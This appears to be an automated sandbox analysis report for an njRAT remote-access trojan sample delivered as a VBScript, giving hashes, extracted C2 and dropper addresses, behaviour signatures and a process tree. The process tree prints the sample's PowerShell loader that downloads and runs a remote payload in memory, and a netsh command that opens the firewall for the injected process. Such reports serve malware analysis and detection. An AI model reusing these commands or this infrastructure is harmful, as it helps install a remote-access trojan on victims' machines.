njrat | 03b0e67b65740307c5f7109587ff3218aa803c0998a23f83f8790fd9a1e0fb47

General

Target

a.vbs
Size

226KB
MD5

9792c84f24e1492cc4d179523fdfcb9d
SHA1

f53e9afdd5ba3302186b6be1ac446c9f081c362f
SHA256

03b0e67b65740307c5f7109587ff3218aa803c0998a23f83f8790fd9a1e0fb47
SHA512

83c42a63b51dfa007012ef6f0b8e2c5e8df31610d2af391f62e7921ce5bc5bdc7eff31f255d8ab96a58563ecb20f0051f61e9482b97ce97ee60e0cfbd0d1518e
SSDEEP

3072:eXFJliLfuE8ozlADw8auustFmbicHkwOt4MYI2x75nehsqgB3F23st+Zn3F/MvVF:sliLfudcHV

Score

10^/10

njrat 1 dic evasion trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://4.204.233.44/Dll/Dll.ppam

Extracted

Family

njrat

Version

im523

Botnet

1 DIC

C2

prueba30novok.duckdns.org:8002

Mutex

5a6bb4a00c1be0a58dddea6ebb918e6f

Attributes

reg_key
5a6bb4a00c1be0a58dddea6ebb918e6f
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

2 3524 powershell.exe
7 3524 powershell.exe
9 3524 powershell.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

3060 netsh.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3524 set thread context of 1320 3524 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

3524 powershell.exe
3524 powershell.exe
4984 powershell.exe
4984 powershell.exe
3524 powershell.exe
3524 powershell.exe

flow	pid	process
2	3524	powershell.exe
7	3524	powershell.exe
9	3524	powershell.exe

pid	process
3060	netsh.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	powershell.exe

description	pid	process	target process
PID 3524 set thread context of 1320	3524	powershell.exe	RegAsm.exe

pid	process
3524	powershell.exe
3524	powershell.exe
4984	powershell.exe
4984	powershell.exe
3524	powershell.exe
3524	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1320	RegAsm.exe
Token: 33	1320	RegAsm.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 3708 wrote to memory of 3524	3708	WScript.exe	powershell.exe
PID 3708 wrote to memory of 3524	3708	WScript.exe	powershell.exe
PID 3524 wrote to memory of 4984	3524	powershell.exe	powershell.exe
PID 3524 wrote to memory of 4984	3524	powershell.exe	powershell.exe
PID 3524 wrote to memory of 4972	3524	powershell.exe	RegAsm.exe
PID 3524 wrote to memory of 4972	3524	powershell.exe	RegAsm.exe
PID 3524 wrote to memory of 4972	3524	powershell.exe	RegAsm.exe
PID 3524 wrote to memory of 1320	3524	powershell.exe	RegAsm.exe
PID 3524 wrote to memory of 1320	3524	powershell.exe	RegAsm.exe
PID 3524 wrote to memory of 1320	3524	powershell.exe	RegAsm.exe
PID 3524 wrote to memory of 1320	3524	powershell.exe	RegAsm.exe
PID 3524 wrote to memory of 1320	3524	powershell.exe	RegAsm.exe
PID 3524 wrote to memory of 1320	3524	powershell.exe	RegAsm.exe
PID 3524 wrote to memory of 1320	3524	powershell.exe	RegAsm.exe
PID 3524 wrote to memory of 1320	3524	powershell.exe	RegAsm.exe
PID 1320 wrote to memory of 3060	1320	RegAsm.exe	netsh.exe
PID 1320 wrote to memory of 3060	1320	RegAsm.exe	netsh.exe
PID 1320 wrote to memory of 3060	1320	RegAsm.exe	netsh.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $roWg = [system.Convert]::FromBase64string((New-object Net.WebClient).DownloadString('http://4.204.233.44/Dll/Dll.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.2008edod2/9278076503521797401/6154437779443457401/stnemhcatta/moc.ppadrocsid.ndc//:sptth'))
2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3524

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" "RegAsm.exe" ENABLE
4⤵
- Modifies Windows Firewall
PID:3060

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
10f09aff3a64f6c2bc0ad68b78da6fd7

SHA1
9389cd1e2407c6e6115228b590030ebff7326218

SHA256
d2bebf93ce80d631191b070bc934bfa2f380aebc4d5f04655cf9932b9bff27a8

SHA512
2d2a43fa44dd7c9a8f70d65aadfa12a0abe3be07ed99955fdb3656934ea6100737114d1656b6410e6cc61e441fed3eba35249900a52978c1b5282bd48b561c3b

Download Submit
memory/1320-150-0x00000000055E0000-0x00000000055EA000-memory.dmp

Filesize
40KB

Download
memory/1320-149-0x0000000005D20000-0x0000000005E22000-memory.dmp

Filesize
1.0MB

Download
memory/1320-148-0x00000000051D0000-0x0000000005262000-memory.dmp

Filesize
584KB

Download
memory/1320-146-0x0000000005660000-0x0000000005C04000-memory.dmp

Filesize
5.6MB

Download
memory/1320-145-0x0000000005010000-0x00000000050AC000-memory.dmp

Filesize
624KB

Download
memory/1320-140-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1320-141-0x000000000040ABBE-mapping.dmp

Download
memory/3060-147-0x0000000000000000-mapping.dmp

Download
memory/3524-136-0x00000298460A0000-0x00000298461A2000-memory.dmp

Filesize
1.0MB

Download
memory/3524-144-0x00007FF8E59B0000-0x00007FF8E6471000-memory.dmp

Filesize
10.8MB

Download
memory/3524-137-0x00007FF8E59B0000-0x00007FF8E6471000-memory.dmp

Filesize
10.8MB

Download
memory/3524-132-0x0000000000000000-mapping.dmp

Download
memory/3524-135-0x000002982B660000-0x000002982B670000-memory.dmp

Filesize
64KB

Download
memory/3524-134-0x000002982B680000-0x000002982B6A2000-memory.dmp

Filesize
136KB

Download
memory/3524-133-0x0000029845E00000-0x0000029845E82000-memory.dmp

Filesize
520KB

Download
memory/4984-139-0x00007FF8E59B0000-0x00007FF8E6471000-memory.dmp

Filesize
10.8MB

Download
memory/4984-138-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads